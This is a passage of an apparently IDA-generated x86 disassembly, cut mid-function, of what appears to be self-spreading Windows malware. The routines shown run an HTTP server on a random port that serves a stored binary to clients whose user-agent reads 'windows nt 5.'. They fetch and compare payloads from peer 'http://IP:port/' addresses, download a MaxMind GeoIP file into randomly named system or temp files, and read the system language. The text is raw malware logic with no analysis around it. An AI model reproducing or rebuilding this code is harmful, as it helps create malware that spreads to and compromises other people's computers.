call esi ; dword_9A11C4
pop ecx
pop ecx
test eax, eax
jz short loc_9ABF21
push offset aUserAgent ; "\r\nuser-agent:"
push edi
call esi ; dword_9A11C4
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_48], edi
test edi, edi
jz short loc_9ABF25
push offset asc_9A1B7C ; "\r\n"
lea eax, [edi+2]
push eax
call esi ; dword_9A11C4
pop ecx
pop ecx
mov [ebp+var_4C], eax
test eax, eax
jz short loc_9ABF25
mov byte ptr [eax], 0
push offset aWindowsNt5_ ; "windows nt 5."
push edi
call esi ; dword_9A11C4
pop ecx
pop ecx
test eax, eax
jz short loc_9ABF25
loc_9ABF21: ; CODE XREF: sub_9ABD83+150�j
; sub_9ABD83+164�j
and [ebp+var_28], 0
loc_9ABF25: ; CODE XREF: sub_9ABD83+177�j
; sub_9ABD83+18B�j ...
push [ebp+var_40]
call sub_9A7DCA
pop ecx
test eax, eax
jnz short loc_9ABF6C
mov ecx, dword_9B55F0
test ecx, ecx
jz short loc_9ABF4C
mov eax, dword_9B54E0
test eax, eax
jz short loc_9ABF4C
cmp eax, 0C3500h
jb short loc_9ABF66
loc_9ABF4C: ; CODE XREF: sub_9ABD83+1B7�j
; sub_9ABD83+1C0�j
mov ecx, dword_9B5854
test ecx, ecx
jz short loc_9ABF6C
mov eax, dword_9B5748
test eax, eax
jz short loc_9ABF6C
cmp eax, 0C3500h
jnb short loc_9ABF6C
loc_9ABF66: ; CODE XREF: sub_9ABD83+1C7�j
mov [ebp+var_2C], ecx
mov [ebp+var_1C], eax
loc_9ABF6C: ; CODE XREF: sub_9ABD83+1AD�j
; sub_9ABD83+1D1�j ...
cmp [ebp+var_28], 0
jz short loc_9ABF83
call dword_9A11D8 ; rand
add eax, 64h
imul eax, 3E8h
jmp short loc_9ABF8D
; ---------------------------------------------------------------------------
loc_9ABF83: ; CODE XREF: sub_9ABD83+1ED�j
mov eax, dword_9B55EC
mov ecx, [ebp+var_1C]
add eax, ecx
loc_9ABF8D: ; CODE XREF: sub_9ABD83+1FE�j
push eax
push offset aHttp1_0200OkPr ; "HTTP/1.0 200 OK\r\nPragma: no-cache\r\nCont"...
push 200h
lea eax, [ebp+var_29C]
push eax
call ebx ; dword_9A11D4
add esp, 10h
mov [ebp+var_9D], 0
and [ebp+var_34], 0
push 7
pop edi
push edi
lea eax, [ebp+var_29C]
push eax
call sub_9B322E ; strlen
pop ecx
push eax
lea eax, [ebp+var_29C]
push eax
mov ebx, [ebp+var_30]
push ebx
call sub_9A82E1
mov esi, eax
lea eax, [ebp+var_29C]
push eax
call sub_9B322E ; strlen
add esp, 14h
cmp eax, esi
jnz loc_9AC07C
xor esi, esi
cmp [ebp+var_28], esi
jnz short loc_9AC037
push edi
push dword_9B55EC
push dword_9B55F4
push ebx
call sub_9A82E1
add esp, 10h
cmp dword_9B55EC, eax
jnz short loc_9AC07C
cmp [ebp+var_2C], esi
jz short loc_9AC02E
cmp [ebp+var_1C], esi
jz short loc_9AC02E
push edi
push [ebp+var_1C]
push [ebp+var_2C]
push ebx
call sub_9A82E1
add esp, 10h
cmp [ebp+var_1C], eax
jnz short loc_9AC07C
loc_9AC02E: ; CODE XREF: sub_9ABD83+28F�j
; sub_9ABD83+294�j
mov [ebp+var_34], 1
jmp short loc_9AC07C
; ---------------------------------------------------------------------------
loc_9AC037: ; CODE XREF: sub_9ABD83+26C�j
mov esi, 1FFh
loc_9AC03C: ; CODE XREF: sub_9ABD83+2F7�j
push esi
lea eax, [ebp+var_29C]
push eax
call sub_9A7FF2
pop ecx
pop ecx
call dword_9A11D8 ; rand
cdq
mov ecx, 1388h
idiv ecx
add edx, 6A4h
push edx
call dword_9A10C4 ; Sleep
push edi
push esi
lea eax, [ebp+var_29C]
push eax
push ebx
call sub_9A82E1
add esp, 10h
cmp eax, esi
jz short loc_9AC03C
loc_9AC07C: ; CODE XREF: sub_9ABD83+261�j
; sub_9ABD83+28A�j ...
cmp [ebp+var_34], 0
jz short loc_9AC0B5
cmp [ebp+var_20], 1
jnz short loc_9AC0B5
push offset dword_9B55F8
call dword_9A106C ; InterlockedIncrement
push dword_9B55F8
call sub_9A7CD4
push [ebp+var_3C]
push [ebp+var_40]
call sub_9A88D6
add esp, 0Ch
jmp short loc_9AC0B5
; ---------------------------------------------------------------------------
loc_9AC0AE: ; DATA XREF: .text:stru_9A1BA8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AC0B2: ; DATA XREF: .text:stru_9A1BA8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AC0B5: ; CODE XREF: sub_9ABD83+65�j
; sub_9ABD83+137�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
cmp [ebp+var_38], 0
jz short loc_9AC0C8
push [ebp+var_38]
call dword_9A10BC ; GlobalFree
loc_9AC0C8: ; CODE XREF: sub_9ABD83+33A�j
push 1
push [ebp+var_30]
call dword_9A1278 ; shutdown
push [ebp+var_30]
call dword_9A1284 ; closesocket
push [ebp+var_44]
call dword_9A10BC ; GlobalFree
xor eax, eax
call __SEH_epilog
retn 4
sub_9ABD83 endp
; =============== S U B R O U T I N E =======================================
sub_9AC0EF proc near ; CODE XREF: sub_9AC1D7+62�p
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
sub esp, 14h
push ebx
push ebp
push edi
xor ebx, ebx
push 10h
lea eax, [esp+24h+var_10]
push ebx
push eax
mov [esp+2Ch+var_14], ebx
call sub_9B3240 ; memset
mov [esp+2Ch+var_10], 2
mov [esp+2Ch+var_C], ebx
call sub_9A7D84
push eax
call dword_9A11A8 ; srand
xor ebp, ebp
add esp, 10h
inc ebp
loc_9AC125: ; CODE XREF: sub_9AC0EF+C3�j
call dword_9A11D8 ; rand
cdq
mov ecx, 2310h
idiv ecx
mov edi, edx
add edi, 400h
push edi
call sub_9A6D4E
test eax, eax
pop ecx
jnz short loc_9AC16A
cmp dword_9B5630, eax
jnz short loc_9AC175
call sub_9A7F99
test eax, eax
jz short loc_9AC162
push 2710h
call dword_9A10C4 ; Sleep
loc_9AC162: ; CODE XREF: sub_9AC0EF+66�j
mov dword_9B5630, ebp
jmp short loc_9AC175
; ---------------------------------------------------------------------------
loc_9AC16A: ; CODE XREF: sub_9AC0EF+55�j
push 1388h
call dword_9A10C4 ; Sleep
loc_9AC175: ; CODE XREF: sub_9AC0EF+5D�j
; sub_9AC0EF+79�j
push 6
push ebp
push 2
call dword_9A12AC ; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_9AC1BE
push edi
call dword_9A1294 ; ntohs
mov [esp+20h+var_E], ax
push 10h
lea eax, [esp+24h+var_10]
push eax
push dword ptr [esi]
call dword_9A126C ; bind
test eax, eax
jz short loc_9AC1BA
push dword ptr [esi]
call dword_9A1284 ; closesocket
inc ebx
cmp ebx, 0Ah
jl loc_9AC125
jmp short loc_9AC1BE
; ---------------------------------------------------------------------------
loc_9AC1BA: ; CODE XREF: sub_9AC0EF+B5�j
mov [esp+20h+var_14], ebp
loc_9AC1BE: ; CODE XREF: sub_9AC0EF+96�j
; sub_9AC0EF+C9�j
call sub_9A7F51
mov eax, [esp+20h+var_14]
movzx ecx, di
neg eax
pop edi
sbb eax, eax
pop ebp
and eax, ecx
pop ebx
add esp, 14h
retn
sub_9AC0EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC1D7 proc near ; DATA XREF: sub_9AC334+18�o
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 220h
push ebx
call sub_9A7F51
xor ebx, ebx
cmp dword_9B55F4, ebx
jz loc_9AC32C
cmp dword_9B55EC, ebx
jz loc_9AC32C
push esi
mov esi, dword_9A11D8
call esi ; dword_9A11D8
push 5
pop ecx
cdq
idiv ecx
add edx, 4
push edx
push offset dword_9B5614
call sub_9A7FF2
call esi ; dword_9A11D8
push 5
pop ecx
cdq
idiv ecx
add edx, 4
push edx
push offset dword_9B5620
call sub_9A7FF2
add esp, 10h
lea esi, [ebp+var_4]
call sub_9AC0EF
mov esi, eax
cmp si, bx
jz loc_9AC31A
push edi
mov edi, [ebp+var_4]
push 32h
push edi
call dword_9A1264 ; listen
test eax, eax
jnz loc_9AC312
movzx eax, si
push eax
push offset dword_9B562C
mov [ebp+var_4], 10h
call dword_9A1064 ; InterlockedExchange
loc_9AC274: ; CODE XREF: sub_9AC1D7+F8�j
; sub_9AC1D7+12A�j ...
xor eax, eax
inc eax
push ebx
mov [ebp+var_220], eax
mov [ebp+var_11C], eax
lea eax, [ebp+var_11C]
push eax
push ebx
lea eax, [ebp+var_220]
push eax
push ebx
mov [ebp+var_21C], edi
mov [ebp+var_118], edi
call dword_9A124C ; select
test eax, eax
jle short loc_9AC312
lea eax, [ebp+var_11C]
push eax
push edi
call sub_9B34C0 ; __WSAFDIsSet
test eax, eax
jnz short loc_9AC312
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_18]
push eax
push edi
call dword_9A1268 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9AC274
push 8
push 40h
call dword_9A10C0 ; GlobalAlloc
cmp eax, ebx
jz short loc_9AC306
mov [eax], esi
mov ecx, [ebp+var_14]
mov [eax+4], ecx
lea ecx, [ebp+var_8]
push ecx
push ebx
push eax
push offset sub_9ABD83
push ebx
push ebx
call dword_9A10EC ; CreateThread
push eax
call dword_9A10E8 ; CloseHandle
jmp loc_9AC274
; ---------------------------------------------------------------------------
loc_9AC306: ; CODE XREF: sub_9AC1D7+106�j
push esi
call dword_9A1284 ; closesocket
jmp loc_9AC274
; ---------------------------------------------------------------------------
loc_9AC312: ; CODE XREF: sub_9AC1D7+81�j
; sub_9AC1D7+D1�j ...
push edi
call dword_9A1284 ; closesocket
pop edi
loc_9AC31A: ; CODE XREF: sub_9AC1D7+6C�j
push ebx
push offset dword_9B562C
call dword_9A1064 ; InterlockedExchange
push 2
pop eax
pop esi
jmp short loc_9AC32F
; ---------------------------------------------------------------------------
loc_9AC32C: ; CODE XREF: sub_9AC1D7+17�j
; sub_9AC1D7+23�j
xor eax, eax
inc eax
loc_9AC32F: ; CODE XREF: sub_9AC1D7+153�j
pop ebx
leave
retn 4
sub_9AC1D7 endp
; =============== S U B R O U T I N E =======================================
sub_9AC334 proc near ; CODE XREF: sub_9A6847+1AA�p
var_4 = byte ptr -4
push ecx
push esi
push edi
xor edi, edi
push edi
push offset dword_9B562C
call dword_9A1064 ; InterlockedExchange
lea eax, [esp+0Ch+var_4]
push eax
push edi
push edi
push offset sub_9AC1D7
push edi
push edi
call dword_9A10EC ; CreateThread
push eax
call dword_9A10E8 ; CloseHandle
xor esi, esi
loc_9AC362: ; CODE XREF: sub_9AC334+45�j
cmp dword_9B562C, edi
jnz short loc_9AC37B
push 1F4h
call dword_9A10C4 ; Sleep
inc esi
cmp esi, 64h
jl short loc_9AC362
loc_9AC37B: ; CODE XREF: sub_9AC334+34�j
mov eax, dword_9B562C
pop edi
pop esi
pop ecx
retn
sub_9AC334 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC384 proc near ; CODE XREF: sub_9A8A08+192�p
; sub_9A8A08+298�p
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
mov eax, dword_9B562C
push edi
xor edi, edi
cmp word ptr [ebp+arg_4], di
jnz short loc_9AC3A0
cmp ax, di
jz short loc_9AC412
loc_9AC3A0: ; CODE XREF: sub_9AC384+15�j
push esi
push offset dword_9B5620
push eax
mov eax, [ebp+arg_0]
mov ecx, eax
shr ecx, 18h
push ecx
movzx ecx, byte ptr [ebp+arg_0+2]
push ecx
movzx ecx, ah
push ecx
and eax, 0FFh
push eax
push offset aHttpD_D_D_DDS ; "http://%d.%d.%d.%d:%d/%s"
lea eax, [ebp+var_80]
push 80h
push eax
call dword_9A11D4 ; _snprintf
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_80]
push eax
call sub_9A8471
mov esi, eax
add esp, 2Ch
cmp esi, edi
jz short loc_9AC411
mov eax, dword_9B55EC
cmp [ebp+arg_4], eax
jb short loc_9AC40A
push eax
push dword_9B55F4
push esi
call sub_9B333C ; memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9AC40A
xor edi, edi
inc edi
loc_9AC40A: ; CODE XREF: sub_9AC384+6D�j
; sub_9AC384+81�j
push esi
call dword_9A10BC ; GlobalFree
loc_9AC411: ; CODE XREF: sub_9AC384+63�j
pop esi
loc_9AC412: ; CODE XREF: sub_9AC384+1A�j
mov eax, edi
pop edi
leave
retn
sub_9AC384 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC417 proc near ; CODE XREF: sub_9A754B+82�p
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+arg_0]
push eax
push offset dword_9A22A4
push offset off_9A3988
call sub_9B34CC
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_9AC417 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC439 proc near ; CODE XREF: sub_9A74B7+5A�p
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+arg_0]
push eax
push offset dword_9A22EC
push offset off_9A3988
call sub_9B34CC
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_9AC439 endp
; =============== S U B R O U T I N E =======================================
sub_9AC45B proc near ; CODE XREF: sub_9AC693:loc_9AC715�p
; sub_9AC843:loc_9AC9D1�p ...
push edi
xor edi, edi
cmp dword_9B5638, edi
jz short loc_9AC46B
xor eax, eax
inc eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_9AC46B: ; CODE XREF: sub_9AC45B+9�j
push esi
push 1
push offset dword_9B5640
call sub_9ACCC3
mov esi, eax
cmp esi, edi
pop ecx
pop ecx
jz short loc_9AC49F
push edi
push esi
call sub_9ACEB4
test eax, eax
pop ecx
pop ecx
jz short loc_9AC496
push esi
call sub_9ACE59
pop ecx
jmp short loc_9AC49F
; ---------------------------------------------------------------------------
loc_9AC496: ; CODE XREF: sub_9AC45B+30�j
xor edi, edi
mov dword_9B5638, esi
inc edi
loc_9AC49F: ; CODE XREF: sub_9AC45B+23�j
; sub_9AC45B+39�j
pop esi
mov eax, edi
pop edi
retn
sub_9AC45B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC4A4 proc near ; CODE XREF: sub_9AC53D+38�p
var_1020 = byte ptr -1020h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_9A3DF0
push offset sub_9B3234
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 1008h
call __alloca_probe
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
and [ebp+var_4], 0
xor edi, edi
inc edi
loc_9AC4DE: ; CODE XREF: sub_9AC4A4+78�j
push 1000h
lea eax, [ebp+var_1020]
push eax
push [ebp+arg_0]
call sub_9AF810
add esp, 0Ch
mov esi, eax
mov [ebp+var_20], esi
test esi, esi
jl short loc_9AC527
jnz short loc_9AC505
mov [ebp+var_1C], edi
jmp short loc_9AC527
; ---------------------------------------------------------------------------
loc_9AC505: ; CODE XREF: sub_9AC4A4+5A�j
push [ebp+arg_4]
push esi
push edi
lea eax, [ebp+var_1020]
push eax
call dword_9A1178 ; fwrite
add esp, 10h
cmp eax, esi
jz short loc_9AC4DE
jmp short loc_9AC527
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
loc_9AC527: ; CODE XREF: sub_9AC4A4+58�j
; sub_9AC4A4+5F�j ...
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_9AC4A4 endp
; =============== S U B R O U T I N E =======================================
sub_9AC53D proc near ; CODE XREF: sub_9AC693+5C�p
; sub_9AC843+197�p
push ebp
push esi
push edi
push offset dword_9A3E00
mov esi, offset dword_9B5640
push esi
xor ebp, ebp
call dword_9A1170 ; fopen
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_9AC599
push ebx
push offset dword_9A3DFC
push offset dword_9B5750
call sub_9AF7FE
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz short loc_9AC585
push edi
push ebx
call sub_9AC4A4
push ebx
mov ebp, eax
call sub_9AF631
add esp, 0Ch
loc_9AC585: ; CODE XREF: sub_9AC53D+34�j
push edi
call dword_9A1174 ; fclose
push esi
call sub_9A8054
test ebp, ebp
pop ecx
pop ecx
pop ebx
jnz short loc_9AC5A9
loc_9AC599: ; CODE XREF: sub_9AC53D+1C�j
push esi
mov esi, dword_9A1078
call esi ; dword_9A1078
push offset dword_9B5750
call esi ; dword_9A1078
loc_9AC5A9: ; CODE XREF: sub_9AC53D+5A�j
pop edi
pop esi
mov eax, ebp
pop ebp
retn
sub_9AC53D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC5AF proc near ; CODE XREF: sub_9AC843+21�p
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 124h
push offset stru_9A3E30
call __SEH_prolog
mov [ebp+var_1C], 9
xor ebx, ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+var_134], bl
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_133]
rep stosd
stosw
stosb
push 104h
lea eax, [ebp+var_134]
push eax
push offset aNtdll_dll ; "ntdll.dll"
call dword_9A1120 ; GetModuleHandleA
push eax
call dword_9A10FC ; GetModuleFileNameA
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_134]
push eax
call sub_9B34F6
mov esi, eax
mov [ebp+var_30], esi
cmp esi, ebx
jz short loc_9AC685
push esi
push 40h
call dword_9A10C0 ; GlobalAlloc
mov edi, eax
mov [ebp+var_2C], edi
cmp edi, ebx
jz short loc_9AC685
push edi
push esi
push ebx
lea eax, [ebp+var_134]
push eax
call sub_9B34F0
test eax, eax
jz short loc_9AC675
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_24]
push eax
push offset aVarfileinfoTra ; "\\VarFileInfo\\Translation"
push edi
call sub_9B34EA
test eax, eax
jz short loc_9AC675
cmp [ebp+var_20], ebx
jz short loc_9AC675
mov eax, [ebp+var_24]
movzx eax, word ptr [eax]
mov [ebp+var_1C], eax
cmp ax, 804h
jz short loc_9AC675
cmp ax, 416h
jz short loc_9AC675
and eax, 0FFFF03FFh
mov [ebp+var_1C], eax
loc_9AC675: ; CODE XREF: sub_9AC5AF+8B�j
; sub_9AC5AF+A2�j ...
push edi
call dword_9A10BC ; GlobalFree
jmp short loc_9AC685
; ---------------------------------------------------------------------------
loc_9AC67E: ; DATA XREF: .text:stru_9A3E30�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AC682: ; DATA XREF: .text:stru_9A3E30�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AC685: ; CODE XREF: sub_9AC5AF+66�j
; sub_9AC5AF+78�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ax, word ptr [ebp+var_1C]
call __SEH_epilog
retn
sub_9AC5AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC693 proc near ; DATA XREF: sub_9AC843+1B3�o
var_60 = byte ptr -60h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 50h
push offset stru_9A3E78
call __SEH_prolog
mov [ebp+var_1C], 7530h
and [ebp+ms_exc.disabled], 0
mov ebx, offset dword_9B5750
loc_9AC6AF: ; CODE XREF: sub_9AC693+37�j
; sub_9AC693+80�j
push 0
lea eax, [ebp+var_20]
push eax
call dword_9A1240
test eax, eax
jnz short loc_9AC6CC
push 3E8h
call dword_9A10C4 ; Sleep
jmp short loc_9AC6AF
; ---------------------------------------------------------------------------
loc_9AC6CC: ; CODE XREF: sub_9AC693+2A�j
push 0Fh
pop ecx
mov esi, offset aHttpWww_maxmin ; "http://www.maxmind.com/download/geoip/d"...
lea edi, [ebp+var_60]
rep movsd
xor esi, esi
push esi
push esi
push ebx
lea eax, [ebp+var_60]
push eax
push esi
call sub_9B34D8
mov [ebp+var_24], eax
cmp eax, esi
jnz short loc_9AC701
call sub_9AC53D
test eax, eax
jnz short loc_9AC715
mov eax, [ebp+var_1C]
shl eax, 2
mov [ebp+var_1C], eax
loc_9AC701: ; CODE XREF: sub_9AC693+5A�j
mov esi, [ebp+var_1C]
push esi
call dword_9A10C4 ; Sleep
mov eax, esi
shl eax, 2
mov [ebp+var_1C], eax
jmp short loc_9AC6AF
; ---------------------------------------------------------------------------
loc_9AC715: ; CODE XREF: sub_9AC693+63�j
call sub_9AC45B
test eax, eax
jz short loc_9AC739
push ebx
push offset dword_9B5748
call sub_9A8119
pop ecx
pop ecx
mov dword_9B5854, eax
jmp short loc_9AC739
; ---------------------------------------------------------------------------
loc_9AC732: ; DATA XREF: .text:stru_9A3E78�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AC736: ; DATA XREF: .text:stru_9A3E78�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AC739: ; CODE XREF: sub_9AC693+89�j
; sub_9AC693+9D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor eax, eax
call __SEH_epilog
retn 4
sub_9AC693 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC747 proc near ; CODE XREF: sub_9A78CC+45�p
var_48 = byte ptr -48h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 38h
push offset stru_9A3E88
call __SEH_prolog
mov [ebp+var_1C], 9
xor edi, edi
mov [ebp+ms_exc.disabled], edi
cmp dword_9B5638, edi
jz loc_9AC824
mov ebx, [ebp+arg_0]
push ebx
call sub_9A7DCA
pop ecx
test eax, eax
jz loc_9AC824
mov eax, ebx
shr eax, 18h
push eax
movzx eax, byte ptr [ebp+arg_0+2]
push eax
movzx eax, bh
push eax
and ebx, 0FFh
push ebx
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
push 20h
lea eax, [ebp+var_48]
push eax
call dword_9A11D4 ; _snprintf
mov [ebp+var_29], 0
lea eax, [ebp+var_48]
push eax
push dword_9B5638
call sub_9ACEB4
add esp, 24h
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_9AC835
push offset dword_9A3C78
push esi
call sub_9B3342 ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_9AC81F
mov [ebp+var_20], edi
loc_9AC7D7: ; CODE XREF: sub_9AC747+D1�j
cmp [ebp+var_20], 17h
jnb short loc_9AC835
cmp word ptr [ebp+var_1C], 9
jnz short loc_9AC835
mov [ebp+var_24], edi
loc_9AC7E7: ; CODE XREF: sub_9AC747+D6�j
mov ebx, [ebp+var_20]
shl ebx, 3
mov eax, off_9B53E0[ebx]
mov ecx, [ebp+var_24]
mov eax, [eax+ecx*4]
cmp eax, edi
jz short loc_9AC815
push eax
push esi
call sub_9B3342 ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_9AC81A
mov ax, word_9B53E4[ebx]
mov word ptr [ebp+var_1C], ax
loc_9AC815: ; CODE XREF: sub_9AC747+B4�j
inc [ebp+var_20]
jmp short loc_9AC7D7
; ---------------------------------------------------------------------------
loc_9AC81A: ; CODE XREF: sub_9AC747+C1�j
inc [ebp+var_24]
jmp short loc_9AC7E7
; ---------------------------------------------------------------------------
loc_9AC81F: ; CODE XREF: sub_9AC747+8B�j
mov [ebp+var_1C], edi
jmp short loc_9AC835
; ---------------------------------------------------------------------------
loc_9AC824: ; CODE XREF: sub_9AC747+1E�j
; sub_9AC747+30�j
mov eax, dword_9B5744
mov [ebp+var_1C], eax
jmp short loc_9AC835
; ---------------------------------------------------------------------------
loc_9AC82E: ; DATA XREF: .text:stru_9A3E88�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AC832: ; DATA XREF: .text:stru_9A3E88�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AC835: ; CODE XREF: sub_9AC747+7A�j
; sub_9AC747+94�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ax, word ptr [ebp+var_1C]
call __SEH_epilog
retn
sub_9AC747 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC843 proc near ; CODE XREF: sub_9A6847+1B3�p
var_238 = byte ptr -238h
var_134 = byte ptr -134h
var_31 = byte ptr -31h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_23 = byte ptr -23h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 228h
push offset stru_9A3EA0
call __SEH_prolog
xor edi, edi
cmp word ptr dword_9B5744, di
jnz loc_9ACA28
mov [ebp+ms_exc.disabled], edi
call sub_9AC5AF
mov word ptr dword_9B5744, ax
mov esi, 104h
push esi
lea eax, [ebp+var_134]
push eax
call dword_9A10E0 ; GetSystemDirectoryA
mov [ebp+var_31], 0
lea eax, [ebp+var_238]
push eax
push edi
mov ebx, offset a0 ; "0"
push ebx
lea eax, [ebp+var_134]
push eax
mov edi, dword_9A1048
call edi ; dword_9A1048
test eax, eax
jnz short loc_9AC8D4
lea eax, [ebp+var_134]
push eax
push esi
call dword_9A104C ; GetTempPathA
mov [ebp+var_31], 0
lea eax, [ebp+var_238]
push eax
push 0
push ebx
lea eax, [ebp+var_134]
push eax
call edi ; dword_9A1048
test eax, eax
jz loc_9ACA24
loc_9AC8D4: ; CODE XREF: sub_9AC843+62�j
lea eax, [ebp+var_238]
push eax
call dword_9A1078 ; DeleteFileA
call sub_9A7D84
push eax
call dword_9A11A8 ; srand
push 8
lea eax, [ebp+var_2C]
push eax
call sub_9A7FF2
push offset dword_9A3E9C
lea eax, [ebp+var_2C]
push eax
call sub_9B3336 ; strcat
push 3
lea eax, [ebp+var_23]
push eax
call sub_9A7FF2
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_134]
push eax
mov ebx, offset dword_9A3E94
push ebx
push esi
push offset dword_9B5640
mov edi, dword_9A11D4
call edi ; dword_9A11D4
mov byte_9B5743, 0
push 8
lea eax, [ebp+var_2C]
push eax
call sub_9A7FF2
push offset dword_9A3E9C
lea eax, [ebp+var_2C]
push eax
call sub_9B3336 ; strcat
add esp, 40h
push 3
lea eax, [ebp+var_23]
push eax
call sub_9A7FF2
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_134]
push eax
push ebx
push esi
mov esi, offset dword_9B5750
push esi
call edi ; dword_9A11D4
mov byte_9B5853, 0
call sub_9A7F51
push esi
mov edi, offset dword_9B5748
push edi
call sub_9A8119
add esp, 24h
mov dword_9B5854, eax
xor ebx, ebx
cmp eax, ebx
jz short loc_9AC9A1
cmp dword_9B5748, ebx
jnz short loc_9AC9D1
loc_9AC9A1: ; CODE XREF: sub_9AC843+154�j
mov ecx, dword_9B55F0
cmp ecx, ebx
jz short loc_9AC9D1
mov eax, dword_9B54E0
cmp eax, ebx
jz short loc_9AC9D1
push esi
push eax
push ecx
call sub_9A81A0
add esp, 0Ch
test eax, eax
jz short loc_9AC9D1
push esi
push edi
call sub_9A8119
pop ecx
pop ecx
mov dword_9B5854, eax
loc_9AC9D1: ; CODE XREF: sub_9AC843+15C�j
; sub_9AC843+166�j ...
call sub_9AC45B
test eax, eax
jnz short loc_9AC9E8
call sub_9AC53D
test eax, eax
jz short loc_9AC9E8
call sub_9AC45B
loc_9AC9E8: ; CODE XREF: sub_9AC843+195�j
; sub_9AC843+19E�j
cmp dword_9B5638, ebx
jnz short loc_9ACA24
lea eax, [ebp+var_30]
push eax
push ebx
push ebx
push offset sub_9AC693
push ebx
push ebx
call dword_9A10EC ; CreateThread
mov [ebp+var_1C], eax
push 493E0h
push eax
call dword_9A1074 ; WaitForSingleObject
push [ebp+var_1C]
call dword_9A10E8 ; CloseHandle
jmp short loc_9ACA24
; ---------------------------------------------------------------------------
loc_9ACA1D: ; DATA XREF: .text:stru_9A3EA0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9ACA21: ; DATA XREF: .text:stru_9A3EA0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9ACA24: ; CODE XREF: sub_9AC843+8B�j
; sub_9AC843+1AB�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_9ACA28: ; CODE XREF: sub_9AC843+18�j
call __SEH_epilog
retn
sub_9AC843 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ACA2E proc near ; CODE XREF: sub_9ACCC3+11C�p
var_C = dword ptr -0Ch
